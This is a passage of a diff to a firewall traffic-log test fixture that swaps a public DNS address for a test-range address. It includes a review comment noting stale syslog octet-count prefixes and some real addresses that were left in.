Access,,,google-base,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:40,7577,1,59652,443,35333,443,0x1400070,tcp,allow,7053,1538,5515,22,2020/03/27 09:57:26,0,computer-and-internet-info,0,2825914,0x0,192.168.0.0-192.168.255.255,United States,0,10,12,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -527 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:36,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,57688,1,44670,53,8799,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:07,0,any,0,2825899,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +527 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:36,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,57688,1,44670,53,8799,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:07,0,any,0,2825899,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 535 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:36,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,7712,1,34594,514,40984,514,0x500070,tcp,allow,905,633,272,9,2020/03/27 09:57:22,0,any,0,2825902,0x0,192.168.0.0-192.168.255.255,Germany,0,5,4,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 538 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 
09:57:36,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:36,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,58586,1,39016,514,26342,514,0x500070,tcp,allow,839,567,272,8,2020/03/27 09:57:22,0,any,0,2825903,0x0,192.168.0.0-192.168.255.255,Germany,0,4,4,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 532 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,7458,1,37455,514,39023,514,0x500000,tcp,allow,575,501,74,4,2020/03/27 09:57:37,0,any,0,2825905,0x0,192.168.0.0-192.168.255.255,Germany,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -528 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:36,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,62291,1,42451,53,40301,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:07,0,any,0,2825900,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -521 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,7754,1,49896,53,26532,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:37,0,any,0,2825904,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -521 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - 
- - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,7885,1,40588,53,35535,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:37,0,any,0,2825909,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +528 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:36,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,62291,1,42451,53,40301,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:07,0,any,0,2825900,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +521 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,7754,1,49896,53,26532,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:37,0,any,0,2825904,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +521 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,7885,1,40588,53,35535,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:37,0,any,0,2825909,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 
541 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.2,172.217.23.174,0.0.0.0,172.217.23.174,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,8024,1,59655,443,53364,443,0x400000,tcp,allow,763,697,66,4,2020/03/27 09:57:37,0,any,0,2825906,0x0,192.168.0.0-192.168.255.255,United States,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 556 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.2,172.217.23.174,0.0.0.0,172.217.23.174,Internet Access,,,web-browsing,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,8024,1,59655,443,53364,443,0x1400000,tcp,allow,5451,1305,4146,12,2020/03/27 09:57:37,0,any,0,2825907,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 566 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.2,172.217.23.174,0.0.0.0,172.217.23.174,Internet Access,,,google-base,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,8024,1,59655,443,53364,443,0x1400000,tcp,allow,5451,1305,4146,12,2020/03/27 09:57:37,0,search-engines,0,2825908,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 
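Review bot: The leading octet count on every rewritten line in this hunk looks stale: replacing 8.8.8.8 with 175.16.199.1 in both the destination and NAT-destination fields makes each frame 10 bytes longer, yet `+521 <14>1 …` keeps the old `521` (likewise the 527/528 prefixes on the `end` lines), and the same applies to the @@ -27,18 and @@ -61,33 hunks of this file. If that prefix is the RFC 5425 octet-count frame length, as the `_ietf` suffix of the file name suggests, each changed line should carry its old value plus 10 (`531`, `537`, `538`, …) so the sample remains a well-formed octet-counted stream and a future switch of the test input to framing-aware parsing does not silently split frames. The sanitization also appears incomplete in the same sense: the unchanged context lines at the end of this hunk (172.217.23.174) and in the next hunk (172.217.23.174, 208.67.220.220) still carry real public addresses, so if the intent is to keep the fixture free of real-world endpoints and stable under GeoIP/ASN database updates, those should be mapped into the same test range and the expected output regenerated for them. If they were left on purpose, a short note in the module's test README stating which addresses are intentionally real would make that explicit for the next reviewer.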
@@ -27,18 +27,18 @@ 556 <14>1 2020-03-27T09:57:34+01:00 PA-VM - - - - 1,2020/03/27 09:57:33,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:33,192.168.2.2,172.217.23.174,0.0.0.0,172.217.23.174,Internet Access,,,web-browsing,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:33,7833,1,59654,443,49119,443,0x1400000,tcp,allow,5409,1262,4147,12,2020/03/27 09:57:34,0,any,0,2825892,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 541 <14>1 2020-03-27T09:57:34+01:00 PA-VM - - - - 1,2020/03/27 09:57:33,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:33,192.168.2.2,172.217.23.174,0.0.0.0,172.217.23.174,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:33,7833,1,59654,443,49119,443,0x400000,tcp,allow,763,697,66,4,2020/03/27 09:57:34,0,any,0,2825891,0x0,192.168.0.0-192.168.255.255,United States,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 566 <14>1 2020-03-27T09:57:34+01:00 PA-VM - - - - 1,2020/03/27 09:57:33,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:33,192.168.2.2,172.217.23.174,0.0.0.0,172.217.23.174,Internet Access,,,google-base,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:33,7833,1,59654,443,49119,443,0x1400000,tcp,allow,5409,1262,4147,12,2020/03/27 09:57:34,0,search-engines,0,2825893,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -528 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:32,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:32,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:32,7412,1,46872,53,14789,53,0x400064,udp,allow,234,109,125,2,2020/03/27 
09:57:03,0,any,0,2825887,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +528 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:32,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:32,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:32,7412,1,46872,53,14789,53,0x400064,udp,allow,234,109,125,2,2020/03/27 09:57:03,0,any,0,2825887,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 536 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,62253,1,40462,514,21854,514,0x500070,tcp,allow,905,633,272,9,2020/03/27 09:57:17,0,any,0,2825876,0x0,192.168.0.0-192.168.255.255,Germany,0,5,4,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 580 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.2,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,google-base,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7574,1,59649,443,60066,443,0x1400070,tcp,allow,6398,1533,4865,21,2020/03/27 09:57:17,0,computer-and-internet-info,0,2825879,0x0,192.168.0.0-192.168.255.255,United States,0,10,11,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -523 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet 
Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7460,1,51210,53,39786,53,0x400000,udp,allow,108,108,0,1,2020/03/27 09:57:32,0,any,0,2825882,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -520 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7365,1,56105,53,4178,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:32,0,any,0,2825883,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +523 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7460,1,51210,53,39786,53,0x400000,udp,allow,108,108,0,1,2020/03/27 09:57:32,0,any,0,2825882,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +520 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7365,1,56105,53,4178,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:32,0,any,0,2825883,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 534 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 
09:57:31,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7209,1,39917,514,45545,514,0x500000,tcp,allow,575,501,74,4,2020/03/27 09:57:32,0,any,0,2825884,0x0,192.168.0.0-192.168.255.255,Germany,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -521 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7790,1,40172,53,26434,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:32,0,any,0,2825885,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +521 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7790,1,40172,53,26434,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:32,0,any,0,2825885,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 537 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7582,1,33442,514,48219,514,0x500070,tcp,allow,905,633,272,9,2020/03/27 09:57:17,0,any,0,2825877,0x0,192.168.0.0-192.168.255.255,Germany,0,5,4,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 573 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 
09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.2,172.217.23.174,0.0.0.0,172.217.23.174,Internet Access,,,google-base,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,47200,1,59650,443,52552,443,0x1400070,tcp,allow,35266,1829,33437,44,2020/03/27 09:57:17,0,search-engines,0,2825878,0x0,192.168.0.0-192.168.255.255,United States,0,15,29,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 537 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.1.2,208.67.220.220,0.0.0.0,208.67.220.220,Internet Access,,,insufficient-data,vsys1,Servers,External,ethernet1/2,ethernet1/1,Default,2020/03/27 09:57:31,6505,1,35869,443,62927,443,0x400064,udp,allow,333,98,235,2,2020/03/27 09:57:02,0,any,0,2825881,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -527 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,6975,1,35510,53,17695,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:02,0,any,0,2825874,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -527 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7666,1,40766,53,45148,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:02,0,any,0,2825875,0x0,192.168.0.0-192.168.255.255,United 
States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +527 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,6975,1,35510,53,17695,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:02,0,any,0,2825874,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +527 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7666,1,40766,53,45148,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:02,0,any,0,2825875,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 528 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.1.2,208.67.220.220,0.0.0.0,208.67.220.220,Internet Access,,,dnscrypt,vsys1,Servers,External,ethernet1/2,ethernet1/1,Default,2020/03/27 09:57:31,7553,1,54348,443,5940,443,0x4000e9,udp,allow,895,238,657,2,2020/03/27 09:57:02,0,any,0,2825880,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 533 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 
09:57:31,7309,1,38650,514,8645,514,0x500000,tcp,allow,575,501,74,4,2020/03/27 09:57:32,0,any,0,2825886,0x0,192.168.0.0-192.168.255.255,Germany,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 527 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:30,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:30,192.168.1.2,208.67.220.220,0.0.0.0,208.67.220.220,Internet Access,,,dnscrypt,vsys1,Servers,External,ethernet1/2,ethernet1/1,Default,2020/03/27 09:57:30,38778,1,46538,443,52919,443,0x400000,udp,allow,968,430,538,2,2020/03/27 09:57:31,0,any,0,2825873,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 
@@ -61,33 +61,33 @@ 537 <14>1 2020-03-27T09:57:26+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:26,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,7389,1,43531,514,16990,514,0x500070,tcp,allow,839,567,272,8,2020/03/27 09:57:12,0,any,0,2825847,0x0,192.168.0.0-192.168.255.255,Germany,0,4,4,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 532 <14>1 2020-03-27T09:57:27+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:26,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,7603,1,32801,514,57533,514,0x500000,tcp,allow,575,501,74,4,2020/03/27 09:57:27,0,any,0,2825850,0x0,192.168.0.0-192.168.255.255,Germany,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 534 <14>1 2020-03-27T09:57:27+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:26,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,7835,1,37836,514,31566,514,0x500000,tcp,allow,575,501,74,4,2020/03/27 09:57:27,0,any,0,2825852,0x0,192.168.0.0-192.168.255.255,Germany,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -527 <14>1 2020-03-27T09:57:26+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:26,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,8108,1,60824,53,28825,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:56:57,0,any,0,2825848,0x0,192.168.0.0-192.168.255.255,United 
